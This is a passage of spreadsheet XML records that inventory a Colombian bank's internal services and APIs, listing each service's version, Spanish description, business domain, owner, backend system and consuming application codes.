    <s v="En esta versión el servicio expone capacidades que permite al usuario consultar la información de rediferidos a través del tipo de documento y numero de documento también permite registrar el mantenimiento respectivo si el mismo es aceptado."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Relacion Producto Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance realizar la creación o actualización de los registros en el archivo CXREF (archivo del iSeries que contiene la relación cliente-producto)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="AW1078 _x000d__x000a_AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Remesas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Remesas, administra las remesas del exterior que son enviadas para ser pagadas en Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Sesion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionSesion permite la administración de sesiones de un cliente autenticado contra un canal virtual del banco. Ofrece operaciones para la validar, cerrar y mantener (keep-alive) una sesión, asi como también un mecanismo para compartir una sesión de un canal a otro y así habilitar el single sign on entre canales."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="NU0017001 _x000d__x000a_NU0034001 _x000d__x000a_AW0360004 _x000d__x000a_AW0278001 _x000d__x000a_AW1240001 _x000d__x000a_AW1281002 _x000d__x000a_NU0021001 _x000d__x000a_NU0143001 _x000d__x000a_SVP _x000d__x000a_NU0104001 _x000d__x000a_AW1059001 _x000d__x000a_AW1165 _x000d__x000a_AW0453001 _x000d__x000a_NU0004001 _x000d__x000a_AW1128 _x000d__x000a_AW1281003 _x000d__x000a_AW0360006 _x000d__x000a_NU0014001 _x000d__x000a_APP _x000d__x000a_AW1312001 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1203001 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_NU0046001 _x000d__x000a_AW1291001 _x000d__x000a_NU0094001 _x000d__x000a_NU0162001 _x000d__x000a_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion SimCard"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio que permite realizar la consulta de la última reexpedición de una simcard, por medio del número telefónico asociado a esta._x000a_ Servicio configurado temporalmente para los operados Movistar y Claro._x000a_ "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="12"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1086001 _x000d__x000a_SSC _x000d__x000a_AW1287 _x000d__x000a_AW1313001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1177 _x000d__x000a_AW0937"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0937 _x000d__x000a_AW1148001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="120"/>
    <x v="0"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1177"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El componente permite realizar compras con tarjetas de crédito sin pasar por la redes, únicamente deberá estar enrolado como medio de pago de uno de los aliados comerciales del Banco."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjeta Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="AW1150"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Credito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio Gestión Tarjetas Crédito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta de Crédito y se describen brevemente a continuación  - Validar código de seguridad"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1316001 _x000d__x000a_NU0103001 _x000d__x000a_NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Tarjetas Crédito permite realizar novedades sobre el producto Tarjetas de Crédito, tales como:  • Crear tarjeta • Bloquear tarjeta • Activar tarjeta  Actualmente sólo está disponible la capacidad de Creación de Tarjetas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Debito"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio Gestión Tarjetas Débito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta Débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="NU0100001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0104001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Debito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Tarjetas Débito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta Débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_NU0021001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tasa Pactada"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Tasa Pactada permitirá realizar la gestión de las tasas pactadas, inicialmente permitirá consultar las tasas que ha pactado el cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Transferencias Internacionales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="SWIFT_SWIFT_AW0290001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Transferencias Internacionales"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia.   Se genera nueva versión 2.0.0. haciendo referencia a la versión 3 del GPI."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="SWIFT_SWIFT_AW0290001"/>
    <s v="CDE _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario Credito Consumo"/>
    <n v="100"/>
    <x v="0"/>
    <s v="La creación y/o actualización de un usuario en el DA host to Host para la unidad Organizativa de Sufi en la cual van a estar matriculados  los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi,  El registro de dicho usuario en la aplicación responsable de la gestión de contraseñas – Biovoz, esto es la creación y/actualización._x005f_x000D_ _x005f_x000D_ El envío del token al usuario para que efectúe el enrolamiento de la voz._x005f_x000D_ _x005f_x000D_ Para ello hará uso de los servicios GestionUsuarioDA, RegistroUsuarioValidacionBiometrica y EnviarNotificacion."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="AW1081001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario DATerceros"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio a través del cual se efectuará la creación y/o actualización de un usuario en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario Valores"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionUsuarioValores permitirá a los consumidores autenticar a un usuario mediante número de documento y contraseña. La idea fundamental es migrar la arquitectura del Audiovalor para una arquitectura estable y escalable que permita estabilizar la sucursal telefónica de valores Bancolombia"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <x v="19"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuarios Divisas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Gestión Usuarios Divisas tiene como objetivo realizar funcionalidades para la consulta o creación de un usuario no cliente Bancolombia que requiera realizar una operación de compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar CDT"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio tiene como propósito llevar a cabo todas las novedades que se le pueden realizar a un CDT, las cuales pueden incluir, modificaciones a las condiciones comerciales. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_AW0210001 _x000d__x000a_SU5 _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Documentos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de gestionar documentos tiene como propósito virtualizar las funcionalidades expuestas por los aplicativos de Gestión Documental y de Proveedor de Servicios para la validación y posterior almacenamiento de información, requerida a los clientes por parte de los productos o procesos del Banco."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0499 _x000d__x000a_AW0856 _x000d__x000a_AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Giros"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Gestionar Giros"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Llaves"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Sincroniza las llaves de un cliente creadas en uno o más sistemas Back-end del grupo Bancolombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611001 _x000d__x000a_AW0709001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Metadata_BB5"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite la actualización de las novedades de información de los atributos (metadatos) generados en los gestores documentales de terceros, en el servidor de contenido de Bancolombia. Este servicio adicionalmente permite registrar nuevos documentos con sus respectivos atributos (metadatos) en el servidor de contenido de Bancolombia."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="ACTUALIZACION DE METADATA_AW0500001"/>
    <s v="AW0718001 _x000d__x000a_AW0550 _x000d__x000a_Carvajal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Pagare Electronico"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Servicio creado para ser invocado por cualquier aplicación que requiera llevar a cabo la administración del pagaré electrónico mediante el uso de los servicios ofrecidos por Deceval."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Deceval"/>
    <s v="AW0937 _x000d__x000a_AW0856 _x000d__x000a_AW1097001 _x000d__x000a_AW1156 _x000d__x000a_AW1197 _x000d__x000a_AW0939 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1203001 _x000d__x000a_NU0004001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176 _x000d__x000a_AW1374007 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW1177 _x000d__x000a_AW0922 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW1177 _x000d__x000a_AW0748001 _x000d__x000a_AW0856 _x000d__x000a_SVP _x000d__x000a_AW1128 _x000d__x000a_NU0034001 _x000d__x000a_AW1011 _x000d__x000a_AW1316 _x000d__x000a_AW1218001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_AW1227001 _x000d__x000a_AW0623001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Prospecto"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio les permite a los consumidores obtener no sólo información específica asociada a la creación o actualización de un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <x v="5"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Solicitud"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El objetivo es tener una estrategia en la cual se unifique la atención de los Créditos Hipotecarios y Leasing Habitacional en un solo flujo y poder ofrecer a los clientes y aliados una propuesta unificada y líder en el mercado"/>
    <m/>
    <m/>
    <x v="10"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="SAP CRM_AW0682001"/>
    <s v="AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Solicitudes De Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El objetivo del servicio es gestionar la solicitud de Crédito y Consumo. "/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0937 _x000d__x000a_AW0718 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Tarjeta En Sistema De Transporte"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GestionarTarjetaEnSistemaDeTransporte, provee la funcionalidad de activar y bloquear la tarjeta débito cívica asignada a un cliente, en el sistema de transporte Metro"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <x v="9"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <s v="Modulo de Administracion de Tarjetas (MAT)_MAT_ISMAT0003"/>
    <s v="MAT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Discrepancia"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite almacenar la aceptación o rechazo de la discrepancia de un producto de Carta de Crédito de Importación o Carta de Crédito de Exportación que tiene el cliente."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Movimiento En Cuenta"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio GrabarMovimientoEnCuenta provee una funcionalidad que permite la afectación de cuentas de clientes (Ahorros o Corrientes) para registrar pagos hechos en Murex a los clientes en sus procesos de negociación con Banitsmo."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Tesoreria"/>
    <x v="1"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Murex_MUREX-CORE_AW0434001"/>
    <s v="MX"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Participante"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Permite crear participante en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611002 _x000d__x000a_AW0611001 _x000d__x000a_AW0795 _x000d__x000a_Banismo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Grabar Participante"/>
    <n v="500"/>
    <x v="0"/>
    <s v="Permite crear participante en el HUB y la sincronización que se debe realizar en otros sistemas (Finacle, IAM, MUREX)"/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="SAP CRM"/>
    <s v="AW0683001 _x000d__x000a_AW0563001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-07-29T16:58:13"/>
    <s v="Gwe - Accounts Reconciliation"/>
    <n v="101"/>
    <s v="Gwe - Accounts Reconciliation - Reconciliation Data Query"/>
    <n v="101"/>
    <x v="210"/>
    <s v="Api que permite  consultar a través de la identificación de un cliente, la información básica de las obligaciones, como lo es el numero de la obligacioó y el tipo de producto, ademas con las obligaciones se puede consultar los abogados que estan gestionando dichas obligaciones"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
